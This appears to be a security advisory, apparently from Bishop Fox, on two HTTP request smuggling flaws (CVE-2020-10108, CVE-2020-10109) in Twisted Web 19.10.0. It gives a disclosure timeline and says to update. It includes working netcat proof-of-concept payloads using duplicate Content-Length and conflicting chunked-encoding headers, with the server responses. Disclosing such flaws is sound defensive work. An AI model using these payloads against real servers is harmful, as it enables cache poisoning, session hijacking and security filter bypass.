The following document describes identified vulnerabilities in the Twisted application version 19.10.0.
Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses. By exploiting inconsistencies in HTTP message parsing, attackers can smuggle complete or partial secondary HTTP messages to a remote server to attack backend services or other users.
In this case, risk is highly contextual, it depends where and why Twisted is deployed in a given environment. The impact will vary depending on the business purpose of the service designed with Twisted.
For more information on the impact of HTTP request splitting vulnerabilities, please refer to the following:
|Twisted Matrix Labs||Twisted||19.10.0|
Twisted is an event-driven networking engine written in Python. The project’s official website is https://twistedmatrix.com/. The latest version of the application is 20.3.0rc1, released on March 9, 2020.
One vulnerability was identified within the Twisted application:
Update to version 20.3.0rc1.
Jake Miller, Security Associate, Bishop Fox - [email protected]
- Initial Discovery: 12/05/2019
- Contact with vendor: 12/09/2019
- Vendor acknowledged vulnerabilities: 12/09/2019
- Touch-base regarding disclosure; vendor optimistic of 3/9 patch deadline: 02/24/2020
- Following up on patch status: 03/03/2020
- Shared assigned CVE IDs with Twisted team: 03/04/2020
- Coordinated full-disclosure/release timeline: 3/06/2020
- Vendor released patched version 20.3.0rc1: 3/09/2020
- Vulnerabilities publicly disclosed: 03/11/2020
This vulnerability is described in the following sections.
HTTP REQUEST SPLITTING
Two HTTP request splitting (AKA HTTP request smuggling) vulnerabilities were identified in the latest version of Twisted Web. Both issues arose from deviations from RFC 7230 (HTTP/1.1: Message Syntax and Routing). Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses.
To demonstrate the vulnerabilities,
netcat command examples are provided to construct raw HTTP messages as the client. For the server, I started Twisted Web 19.10.0 using
twistd web --path . --port tcp: (Twisted Framework Python apps that use
twistd.web are also affected).
|CVE-2020-10108||High||HTTP Request Splitting||Remote, Other|
Double Content-Length Headers
When presented with two content-length headers, Twisted Web ignored the first header. When the second content-length was set to zero, it caused Twisted Web to interpret the request body as a pipelined request.
According to RFC 7230 Section 3.3.3#4, if a message is received with multiple content-length headers with differing value, then the server must reject the message with a 400 response.
printf 'GET /doesnotexist HTTP/1.1\r\n'\ 'Content-Length: 56\r\n'\ 'Content-Length: 0\r\n'\ 'Host: test.example.com\r\n'\ '\r\n'\ 'GET /?opfdii=k58inf HTTP/1.1\r\n'\ 'Host: test.example.com\r\n'\ '\r\n' | nc 127.0.0.1 <port
HTTP/1.1 404 Not Found Server: TwistedWeb/19.10.0 Date: Mon, 09 Dec 2019 17:02:45 GMT Content-Type: text/html; charset=utf-8 Content-Length: 145 <html> <head><title>404 - No Such Resource</title></head> <body> <h1>No Such Resource</h1> <p>File not found.</p> </body> </html> HTTP/1.1 200 OK Server: TwistedWeb/19.10.0 Date: Mon, 09 Dec 2019 17:02:45 GMT Accept-Ranges: bytes Content-Length: 6 Content-Type: text/html Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT Hello
As shown above, both the
/doesnotexist and the smuggled request to the base path
[/] were successfully resolved.
|CVE-2020-10109||High||HTTP Request Splitting||Remote, Other|
Differing Content-Length/Chunked Encoding
When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted by Twisted Web as a pipelined request.
According to RFC 7230 Section 3.3.3#3, if a message with both content-length and chunked encoding is accepted, transfer-encoding overrides the content-length.
printf 'GET /?nkomd7=8h7pjm HTTP/1.1\r\n'\ 'Transfer-Encoding: chunked\r\n'\ 'Content-Length: 4\r\n'\ 'Content-Type: application/x-www-form-urlencoded\r\n'\ 'Host: test.example.com\r\n'\ '\r\n'\ '33\r\n'\ 'GET /?ab8c4i=deg3if HTTP/1.1\r\n'\ 'Content-Length: 5\r\n'\ 'Host: test.example.com\r\n'\ '\r\n'\ '\r\n'\ '0\r\n'\ '\r\n' | nc 127.0.0.1 <port>
HTTP/1.1 200 OK Server: TwistedWeb/19.10.0 Date: Mon, 09 Dec 2019 17:04:19 GMT Accept-Ranges: bytes Content-Length: 6 Content-Type: text/html Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT Hello HTTP/1.1 200 OK Server: TwistedWeb/19.10.0 Date: Mon, 09 Dec 2019 17:04:19 GMT Accept-Ranges: bytes Content-Length: 6 Content-Type: text/html Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT Hello
As shown above, smuggled requests were interpreted by the Twisted server. The impact of these vulnerabilities can vary depending on the surrounding infrastructure and the purpose of the service implemented with Twisted.
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.